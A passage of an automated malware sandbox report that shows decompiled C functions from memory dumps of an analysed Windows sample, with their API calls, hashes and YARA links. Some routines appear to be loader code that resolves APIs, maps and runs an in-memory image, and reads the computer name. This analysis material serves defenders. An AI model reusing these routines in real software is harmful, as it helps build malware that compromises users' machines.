								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}

0x02ea21a1
0x02ea21a4
0x02ea21b4
0x02ea21bd
0x02ea21c1
0x02ea228f
0x02ea2295
0x02ea2295
0x02ea21db
0x02ea21e0
0x02ea21e4
0x02ea21ea
0x02ea21ef
0x02ea21f6
0x02ea2205
0x02ea2205
0x02ea2209
0x02ea220b
0x02ea2217
0x02ea2222
0x02ea222d
0x02ea2231
0x02ea223b
0x02ea223f
0x02ea2241
0x02ea2246
0x02ea224d
0x02ea225d
0x02ea225d
0x02ea2246
0x02ea223f
0x02ea225f
0x02ea2264
0x02ea2269
0x02ea2269
0x02ea226c
0x02ea2275
0x02ea227a
0x02ea227a
0x02ea227f
0x02ea2284
0x02ea2284
0x02ea227f
0x02ea2209
0x02ea2286
0x02ea228c
0x00000000

APIs

Part of subcall function 02EA3AB0: SysAllocString.OLEAUT32(80000002), ref: 02EA3B0D
Part of subcall function 02EA3AB0: SysFreeString.OLEAUT32(00000000), ref: 02EA3B73

SysFreeString.OLEAUT32(?), ref: 02EA227A
SysFreeString.OLEAUT32(02EA85ED), ref: 02EA2284

Memory Dump Source

Source File: 00000002.00000002.479405734.0000000002EA1000.00000020.00000001.sdmp, Offset: 02EA0000, based on PE: true

Associated: 00000002.00000002.479379747.0000000002EA0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479456411.0000000002EAC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.479484938.0000000002EAD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479532107.0000000002EAF000.00000002.00000001.sdmp Download File

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: d59d170c0c6cacf33590ee592132aa9ca8504de5eba8366322bf275f323a282f
Instruction ID: 94769c4452091d839de422cdede50c42b64f3027a7d0435f927b6623130b9718
Opcode Fuzzy Hash: d59d170c0c6cacf33590ee592132aa9ca8504de5eba8366322bf275f323a282f
Instruction Fuzzy Hash: 1D315B71540119AFCB11DFA4C898C9BBB7AFBC97487158658FD19AB210E331ED51CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A1E55, Relevance: 3.1, APIs: 2, Instructions: 59
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E1A1E55() {
				char _v16;
				intOrPtr _v28;
				void _v32;
				void* _v36;
				intOrPtr _t15;
				void* _t16;
				long _t25;
				int _t26;
				void* _t30;
				intOrPtr* _t32;
				signed int _t36;
				intOrPtr _t39;

				_t15 =  *0x6e1a4144;
				if( *0x6e1a412c > 5) {
					_t16 = _t15 + 0x6e1a50f9;
				} else {
					_t16 = _t15 + 0x6e1a50b1;
				}
				E6E1A16F1(_t16, _t16);
				_t36 = 6;
				memset( &_v32, 0, _t36 << 2);
				if(E6E1A132A( &_v32,  &_v16,  *0x6e1a4140 ^ 0xfd7cd1cf) == 0) {
					_t25 = 0xb;
				} else {
					_t26 = lstrlenW( *0x6e1a4138);
					_t8 = _t26 + 2; // 0x2
					_t11 = _t26 + _t8 + 8; // 0xa
					_t30 = E6E1A1ADA(_t39, _t11,  &_v32,  &_v36); // executed
					if(_t30 == 0) {
						_t32 = _v36;
						 *_t32 = 0;
						if( *0x6e1a4138 == 0) {
							 *((short*)(_t32 + 4)) = 0;
						} else {
							E6E1A2033(_t44, _t32 + 4);
						}
					}
					_t25 = E6E1A1634(_v28); // executed
				}
				ExitThread(_t25);
			}

0x6e1a1e5b
0x6e1a1e6c
0x6e1a1e76
0x6e1a1e6e
0x6e1a1e6e
0x6e1a1e6e
0x6e1a1e7d
0x6e1a1e86
0x6e1a1e8b
0x6e1a1ea9
0x6e1a1f05
0x6e1a1eab
0x6e1a1eb1
0x6e1a1eb7
0x6e1a1ec5
0x6e1a1ec9
0x6e1a1ed0
0x6e1a1ed9
0x6e1a1edd
0x6e1a1ee3
0x6e1a1ef4
0x6e1a1ee5
0x6e1a1eeb
0x6e1a1eeb
0x6e1a1ee3
0x6e1a1efc
0x6e1a1efc
0x6e1a1f07

APIs

lstrlenW.KERNEL32(?,?,?,?), ref: 6E1A1EB1
ExitThread.KERNEL32 ref: 6E1A1F07

Memory Dump Source

Source File: 00000002.00000002.482973079.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.482953775.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.483022155.000000006E1A3000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.483068232.000000006E1A5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.483115438.000000006E1A6000.00000002.00020000.sdmp Download File

Similarity

API ID: ExitThreadlstrlen
String ID:
API String ID: 2636182767-0
Opcode ID: 1b867a7fa7ed1a065c19d5c41fbe2db6a33c1f20956d378b53e36cc22abf88e2
Instruction ID: b1bd350405116778d42da5aaa15035e8e4a978f0d0416a97c3b7dc5dd7e6b96b
Opcode Fuzzy Hash: 1b867a7fa7ed1a065c19d5c41fbe2db6a33c1f20956d378b53e36cc22abf88e2
Instruction Fuzzy Hash: B011D0B62086069FEB11CBACC848EAF77ECAB15344F114815B650D3150EB30E58DEB92

Uniqueness

Uniqueness Score: -1.00%

Function 02EA58DB, Relevance: 3.0, APIs: 2, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E02EA58DB(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E02EAA71F(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E02EAA734(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}

0x02ea58e0
0x02ea58eb
0x02ea58ed
0x02ea58f3
0x02ea58f5
0x02ea58fa
0x02ea5903
0x02ea5907
0x02ea5910
0x02ea5914
0x02ea5923
0x02ea5916
0x02ea5917
0x02ea591c
0x02ea591c
0x02ea5914
0x02ea5907
0x02ea592c

APIs

GetComputerNameExA.KERNELBASE(00000003,00000000,02EA1FA0,74B5F710,00000000,?,?,02EA1FA0), ref: 02EA58F3

Part of subcall function 02EAA71F: RtlAllocateHeap.NTDLL(00000000,00000000,02EA5595), ref: 02EAA72B

GetComputerNameExA.KERNELBASE(00000003,00000000,02EA1FA0,02EA1FA1,?,?,02EA1FA0), ref: 02EA5910

Part of subcall function 02EAA734: HeapFree.KERNEL32(00000000,00000000,02EA5637,00000000,?,?,00000000), ref: 02EAA740

Memory Dump Source

Source File: 00000002.00000002.479405734.0000000002EA1000.00000020.00000001.sdmp, Offset: 02EA0000, based on PE: true

Associated: 00000002.00000002.479379747.0000000002EA0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479456411.0000000002EAC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.479484938.0000000002EAD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479532107.0000000002EAF000.00000002.00000001.sdmp Download File

Similarity

API ID: ComputerHeapName$AllocateFree
String ID:
API String ID: 187446995-0
Opcode ID: 17dc967f41f169daed7b1a1b8f5bdee9892d1306152aeef44c31309d71afff33
Instruction ID: 6468ffa424b51f19fb298a9e0b94b8aec4613412b772004640518cf63016f802
Opcode Fuzzy Hash: 17dc967f41f169daed7b1a1b8f5bdee9892d1306152aeef44c31309d71afff33
Instruction Fuzzy Hash: E2F0B476A40205BAEB11D79A8C20FAF36FDEBC4614F615069F510EB100EA70FA01CA70

Uniqueness

Uniqueness Score: -1.00%

Function 02EA4ECA, Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t14;

				_t14 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0x2ead23c) == 0) {
						E02EA1B42();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0x2ead23c) == 1) {
						_t10 = E02EA12E5(_t11, _t12, _a4); // executed
						if(_t10 != 0) {
							_t14 = 0;
						}
					}
				}
				return _t14;
			}

0x02ea4ed1
0x02ea4ed2
0x02ea4ed5
0x02ea4f07
0x02ea4f09
0x02ea4f09
0x02ea4ed7
0x02ea4ed8
0x02ea4eed
0x02ea4ef4
0x02ea4ef6
0x02ea4ef6
0x02ea4ef4
0x02ea4ed8
0x02ea4f11

APIs

InterlockedIncrement.KERNEL32(02EAD23C), ref: 02EA4EDF

Part of subcall function 02EA12E5: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,02EA4EF2,?), ref: 02EA12F8

InterlockedDecrement.KERNEL32(02EAD23C), ref: 02EA4EFF

Memory Dump Source

Source File: 00000002.00000002.479405734.0000000002EA1000.00000020.00000001.sdmp, Offset: 02EA0000, based on PE: true

Associated: 00000002.00000002.479379747.0000000002EA0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479456411.0000000002EAC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.479484938.0000000002EAD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479532107.0000000002EAF000.00000002.00000001.sdmp Download File

Similarity

API ID: Interlocked$CreateDecrementHeapIncrement
String ID:
API String ID: 3834848776-0
Opcode ID: f948a2e02f7ea1a0bf2f6f0179c530dfe1c867c505e3165196cb3ff0010fb819
Instruction ID: 4065c089861aa0a7d5de1802069432019e7758a7e238cd37e12ce93eeeb18852
Opcode Fuzzy Hash: f948a2e02f7ea1a0bf2f6f0179c530dfe1c867c505e3165196cb3ff0010fb819
Instruction Fuzzy Hash: 42E020392C813153E3621A76AD34B5A9643DFC0748F03F410F489CC0C4E390F450D6A5

Uniqueness

Uniqueness Score: -1.00%

Function 02EA48F1, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E02EA48F1(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				char _v20;
				intOrPtr _t15;
				void* _t17;
				intOrPtr _t19;
				void* _t23;

				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x2ead2a8; // 0xb1a5a8
				_t4 = _t15 + 0x2eae39c; // 0x39c8944
				_t20 = _t4;
				_t6 = _t15 + 0x2eae124; // 0x650047
				_t17 = E02EA219B(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					_t23 = 8;
					if(_v20 != _t23) {
						_t23 = 1;
					} else {
						_t19 = E02EA2298(_t20, _v12);
						if(_t19 != 0) {
							 *_a16 = _t19;
							_t23 = 0;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}

0x02ea48fb
0x02ea4902
0x02ea4903
0x02ea4904
0x02ea4905
0x02ea490b
0x02ea4910
0x02ea4910
0x02ea491a
0x02ea492c
0x02ea4933
0x02ea4961
0x02ea4935
0x02ea4937
0x02ea493c
0x02ea495e
0x02ea493e
0x02ea4941
0x02ea4948
0x02ea494d
0x02ea494f
0x02ea494f
0x02ea4954
0x02ea4954
0x02ea493c
0x02ea4968

APIs

Part of subcall function 02EA219B: SysFreeString.OLEAUT32(?), ref: 02EA227A

Part of subcall function 02EA2298: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,02EA84CA,004F0053,00000000,?), ref: 02EA22A1
Part of subcall function 02EA2298: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,02EA84CA,004F0053,00000000,?), ref: 02EA22CB
Part of subcall function 02EA2298: memset.NTDLL ref: 02EA22DF

SysFreeString.OLEAUT32(00000000), ref: 02EA4954

Memory Dump Source

Source File: 00000002.00000002.479405734.0000000002EA1000.00000020.00000001.sdmp, Offset: 02EA0000, based on PE: true

Associated: 00000002.00000002.479379747.0000000002EA0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479456411.0000000002EAC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.479484938.0000000002EAD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479532107.0000000002EAF000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeString$lstrlenmemcpymemset
String ID:
API String ID: 397948122-0
Opcode ID: 16c2ed39fa0aca2271ef3a7b275f5ce4a92709cff191cf5ef45ec6f1657bb647
Instruction ID: 0b8d175e18a0e5f8084bcafaaa7b5b26fc68fdaccb19a47216078af020ebe08d
Opcode Fuzzy Hash: 16c2ed39fa0aca2271ef3a7b275f5ce4a92709cff191cf5ef45ec6f1657bb647
Instruction Fuzzy Hash: 73019E3258001ABFDB119BA4CC509AABBB9FB44344F008465EA04AB060D3B0B925C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DCBB1, Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,?,6E1D6C97,?), ref: 6E1DCBC6

Memory Dump Source

Source File: 00000002.00000002.483277940.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 0146fa14ff3f797d5c028fedf0acdfbd1472a0530ed25cc1d055a370468e6c6b
Instruction ID: 820333205368eae30f854d8f122d52634dc1706d08cd2fea688c312134bb87b7
Opcode Fuzzy Hash: 0146fa14ff3f797d5c028fedf0acdfbd1472a0530ed25cc1d055a370468e6c6b
Instruction Fuzzy Hash: E5D05EB2AA47495EDF005EB6A80DB623BECF3857A5F108835B91DC6144E675C941DA10

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A16F1, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E6E1A16F1(void* __eax, intOrPtr _a4) {

				 *0x6e1a4150 =  *0x6e1a4150 & 0x00000000;
				_push(0);
				_push(0x6e1a414c);
				_push(1);
				_push(_a4);
				 *0x6e1a4148 = 0xc; // executed
				L6E1A1A3E(); // executed
				return __eax;
			}

0x6e1a16f1
0x6e1a16f8
0x6e1a16fa
0x6e1a16ff
0x6e1a1701
0x6e1a1705
0x6e1a170f
0x6e1a1714

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(6E1A1E82,00000001,6E1A414C,00000000), ref: 6E1A170F

Memory Dump Source

Source File: 00000002.00000002.482973079.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.482953775.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.483022155.000000006E1A3000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.483068232.000000006E1A5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.483115438.000000006E1A6000.00000002.00020000.sdmp Download File

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: 888a5873f5bb4b079a3663a45b4e71e0fb0e761f1f40cae9428efc3e312048b5
Instruction ID: 56219bf3528936560d05e093fd858a55959a90c44e7434728a16b5c5647522f7
Opcode Fuzzy Hash: 888a5873f5bb4b079a3663a45b4e71e0fb0e761f1f40cae9428efc3e312048b5
Instruction Fuzzy Hash: ECC04CFC240780A6EA209F988C49F6A7A51B761705F118504B214252C1CBF5209AA515

Uniqueness

Uniqueness Score: -1.00%

Function 02EAA71F, Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02EAA71F(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x2ead238, 0, _a4); // executed
				return _t2;
			}

0x02eaa72b
0x02eaa731

APIs

RtlAllocateHeap.NTDLL(00000000,00000000,02EA5595), ref: 02EAA72B

Memory Dump Source

Source File: 00000002.00000002.479405734.0000000002EA1000.00000020.00000001.sdmp, Offset: 02EA0000, based on PE: true

Associated: 00000002.00000002.479379747.0000000002EA0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479456411.0000000002EAC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.479484938.0000000002EAD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479532107.0000000002EAF000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 0daaad467897a9b8fa9821f636356f1849dc0bbc15b17b871c982c7d956a30a8
Instruction ID: 2c0ec341f9466435fc26b05a825be5a9637f0d72d3f91b65a23118801a84d931
Opcode Fuzzy Hash: 0daaad467897a9b8fa9821f636356f1849dc0bbc15b17b871c982c7d956a30a8
Instruction Fuzzy Hash: E4B012358C0100ABCA014B01DD09F06BB62FB50700F524911B20844470833164F0EB14

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DAC71, Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

__encode_pointer.LIBCMT ref: 6E1DAC73

Part of subcall function 6E1DABFF: RtlEncodePointer.NTDLL(00000000,?,6E1DAC78,00000000,6E1E5A67,6E29A270,00000000,00000314,?,6E1DD0DA,6E29A270,6E1FE438,00012010), ref: 6E1DAC66

Memory Dump Source

Source File: 00000002.00000002.483277940.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: EncodePointer__encode_pointer
String ID:
API String ID: 4150071819-0
Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction ID: c0ec3df7dfb2676b3eabd7b2e1e64625d98d1eb03a23cc5d0fa29abd07860359
Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A1634, Relevance: 1.3, APIs: 1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E6E1A1634(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				void* _t18;
				long _t24;
				long _t26;
				long _t29;
				intOrPtr _t40;
				void* _t41;
				intOrPtr* _t42;
				void* _t44;

				_t41 = __eax;
				_t16 =  *0x6e1a4140;
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e1a4140 - 0x63698bc4 &  !( *0x6e1a4140 - 0x63698bc4);
				_t18 = E6E1A1146( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e1a4140 - 0x63698bc4 &  !( *0x6e1a4140 - 0x63698bc4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e1a4140 - 0x63698bc4 &  !( *0x6e1a4140 - 0x63698bc4), _t16 + 0x9c96647d,  &_v8,  &_v12); // executed
				if(_t18 != 0) {
					_t29 = 8;
					goto L8;
				} else {
					_t40 = _v8;
					_t29 = E6E1A1CBE(_t33, _t40, _t41);
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
						_t24 = E6E1A1BAC(_t40, _t44); // executed
						_t29 = _t24;
						if(_t29 == 0) {
							_t26 = E6E1A1020(_t44, _t40); // executed
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E6E1A201E(_t42);
					L8:
					return _t29;
				}
			}

0x6e1a163c
0x6e1a163e
0x6e1a165a
0x6e1a166b
0x6e1a1672
0x6e1a16d0
0x00000000
0x6e1a1674
0x6e1a1674
0x6e1a167e
0x6e1a1682
0x6e1a1687
0x6e1a168a
0x6e1a168f
0x6e1a1693
0x6e1a1698
0x6e1a169d
0x6e1a16a1
0x6e1a16a6
0x6e1a16a7
0x6e1a16ab
0x6e1a16b0
0x6e1a16b8
0x6e1a16b8
0x6e1a16b0
0x6e1a16a1
0x6e1a1693
0x6e1a16ba
0x6e1a16c3
0x6e1a16c7
0x6e1a16d1
0x6e1a16d7
0x6e1a16d7

APIs

Part of subcall function 6E1A1146: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,6E1A1670,?,?,?,?,?,00000002,?,?), ref: 6E1A116A
Part of subcall function 6E1A1146: GetProcAddress.KERNEL32(00000000,?), ref: 6E1A118C
Part of subcall function 6E1A1146: GetProcAddress.KERNEL32(00000000,?), ref: 6E1A11A2
Part of subcall function 6E1A1146: GetProcAddress.KERNEL32(00000000,?), ref: 6E1A11B8
Part of subcall function 6E1A1146: GetProcAddress.KERNEL32(00000000,?), ref: 6E1A11CE
Part of subcall function 6E1A1146: GetProcAddress.KERNEL32(00000000,?), ref: 6E1A11E4

Part of subcall function 6E1A1CBE: memcpy.NTDLL(00000002,?,6E1A167E,?,?,?,?,?,6E1A167E,?,?,?,?,?,?,?), ref: 6E1A1CF5
Part of subcall function 6E1A1CBE: memcpy.NTDLL(00000002,?,?,?,00000002), ref: 6E1A1D2A

Part of subcall function 6E1A1BAC: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 6E1A1BE4

Part of subcall function 6E1A1020: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 6E1A1059
Part of subcall function 6E1A1020: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6E1A10CE
Part of subcall function 6E1A1020: GetLastError.KERNEL32 ref: 6E1A10D4

GetLastError.KERNEL32(?,?), ref: 6E1A16B2

Memory Dump Source

Source File: 00000002.00000002.482973079.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.482953775.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.483022155.000000006E1A3000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.483068232.000000006E1A5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.483115438.000000006E1A6000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
String ID:
API String ID: 2673762927-0
Opcode ID: 6b7ca2f2dcf540883f5735bd42af9d8c125e30e3c43112a680ba411e3b538da1
Instruction ID: 23bdc9b0a748e6d30b26ad3d415f5a142bfc8bb6c90408d3b8a4484ed00d87e0
Opcode Fuzzy Hash: 6b7ca2f2dcf540883f5735bd42af9d8c125e30e3c43112a680ba411e3b538da1
Instruction Fuzzy Hash: BC11E9BA7007116BC7109AED88809EF77BCBF542047084514EB05D7645EBE0E94A97A0

Uniqueness

Uniqueness Score: -1.00%

Function 02EA5356, Relevance: 1.3, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02EA5356(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
				void* _t21;
				void* _t22;
				signed int _t24;
				intOrPtr* _t26;
				void* _t27;

				_t26 = __edi;
				if(_a4 == 0) {
					L2:
					_t27 = E02EA8BC1(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t27 == 0) {
						_t24 = _a12 >> 1;
						if(_t24 == 0) {
							_t27 = 2;
							HeapFree( *0x2ead238, 0, _a4);
						} else {
							_t21 = _a4;
							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
							 *_t26 = _t21;
						}
					}
					L6:
					return _t27;
				}
				_t22 = E02EA48F1(_a4, _a8, _a12, __edi); // executed
				_t27 = _t22;
				if(_t27 == 0) {
					goto L6;
				}
				goto L2;
			}

0x02ea5356
0x02ea535e
0x02ea5375
0x02ea5390
0x02ea5394
0x02ea5399
0x02ea539b
0x02ea53ad
0x02ea53b9
0x02ea539d
0x02ea539d
0x02ea53a2
0x02ea53a7
0x02ea53a7
0x02ea539b
0x02ea53bf
0x02ea53c3
0x02ea53c3
0x02ea536a
0x02ea536f
0x02ea5373
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 02EA48F1: SysFreeString.OLEAUT32(00000000), ref: 02EA4954

HeapFree.KERNEL32(00000000,00000000,00000000,80000002,74B5F710,?,00000000,?,00000000,?,02EA8D51,?,004F0053,039C9368,00000000,?), ref: 02EA53B9

Memory Dump Source

Source File: 00000002.00000002.479405734.0000000002EA1000.00000020.00000001.sdmp, Offset: 02EA0000, based on PE: true

Associated: 00000002.00000002.479379747.0000000002EA0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479456411.0000000002EAC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.479484938.0000000002EAD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479532107.0000000002EAF000.00000002.00000001.sdmp Download File

Similarity

API ID: Free$HeapString
String ID:
API String ID: 3806048269-0
Opcode ID: 165a449a4c855bbdb2b77fec084f07eb533a42f1d5c42ad9ba8c72052f96be37
Instruction ID: e96c930ddf847c4faf5ba26dbce21364c7454da610d4ec9d5549c408609d3201
Opcode Fuzzy Hash: 165a449a4c855bbdb2b77fec084f07eb533a42f1d5c42ad9ba8c72052f96be37
Instruction Fuzzy Hash: A301A232981519BBCB229F54CC11FDE7B65EF44790F45D018FE099E124D771E960DB90

Uniqueness

Uniqueness Score: -1.00%

Function 02EA1AE2, Relevance: 1.3, APIs: 1, Instructions: 36
sleepCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E02EA1AE2(intOrPtr* __edi) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _t15;
				intOrPtr* _t21;

				_t21 = __edi;
				_push( &_v12);
				_push(__edi);
				_v8 = 0x1d4c0;
				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
				while(1) {
					_v16 = _t15;
					Sleep(0x1f4); // executed
					if(_v12 == 4) {
						break;
					}
					if(_v8 == 0) {
						L4:
						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
						continue;
					} else {
						if(_v8 <= 0x1f4) {
							_v16 = 0x80004004;
						} else {
							_v8 = _v8 - 0x1f4;
							goto L4;
						}
					}
					L8:
					return _v16;
				}
				goto L8;
			}

0x02ea1ae2
0x02ea1aef
0x02ea1af0
0x02ea1af1
0x02ea1af8
0x02ea1b26
0x02ea1b27
0x02ea1b2a
0x02ea1b30
0x00000000
0x00000000
0x02ea1b0f
0x02ea1b19
0x02ea1b20
0x00000000
0x02ea1b11
0x02ea1b14
0x02ea1b34
0x02ea1b16
0x02ea1b16
0x00000000
0x02ea1b16
0x02ea1b14
0x02ea1b3b
0x02ea1b41
0x02ea1b41
0x00000000

APIs

Sleep.KERNELBASE(000001F4), ref: 02EA1B2A

Memory Dump Source

Source File: 00000002.00000002.479405734.0000000002EA1000.00000020.00000001.sdmp, Offset: 02EA0000, based on PE: true

Associated: 00000002.00000002.479379747.0000000002EA0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479456411.0000000002EAC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.479484938.0000000002EAD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479532107.0000000002EAF000.00000002.00000001.sdmp Download File

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 3fa218e96003d79c85045be8c5c07c09a7776a76ab34565a9210a733bbfe3266
Instruction ID: 1789426ebc28919adb5af2b34935385dba609ff557c90d264ecaa021f2d64bce
Opcode Fuzzy Hash: 3fa218e96003d79c85045be8c5c07c09a7776a76ab34565a9210a733bbfe3266
Instruction Fuzzy Hash: 90F01275D42218EFDB10DBD8C5A9AEDB7B8FF04309F1094AAE5066B140E7746B84CF51

Uniqueness

Uniqueness Score: -1.00%

Function 02EA4A09, Relevance: 1.3, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02EA4A09(void* __edi, void* _a4) {
				int _t7;
				int _t12;

				_t7 = E02EA1526(__edi, _a4,  &_a4); // executed
				_t12 = _t7;
				if(_t12 != 0) {
					memcpy(__edi, _a4, _t12);
					 *((char*)(__edi + _t12)) = 0;
					E02EAA734(_a4);
				}
				return _t12;
			}

0x02ea4a15
0x02ea4a1a
0x02ea4a1e
0x02ea4a25
0x02ea4a30
0x02ea4a34
0x02ea4a34
0x02ea4a3d

APIs

Part of subcall function 02EA1526: memcpy.NTDLL(00000000,00000090,00000002,00000002,02EA5289,00000008,02EA5289,02EA5289,?,02EAA3FE,02EA5289), ref: 02EA155C
Part of subcall function 02EA1526: memset.NTDLL ref: 02EA15D1
Part of subcall function 02EA1526: memset.NTDLL ref: 02EA15E5

memcpy.NTDLL(00000002,02EA5289,00000000,00000002,02EA5289,02EA5289,02EA5289,?,02EAA3FE,02EA5289,?,02EA5289,00000002,?,?,02EA5D5E), ref: 02EA4A25

Part of subcall function 02EAA734: HeapFree.KERNEL32(00000000,00000000,02EA5637,00000000,?,?,00000000), ref: 02EAA740

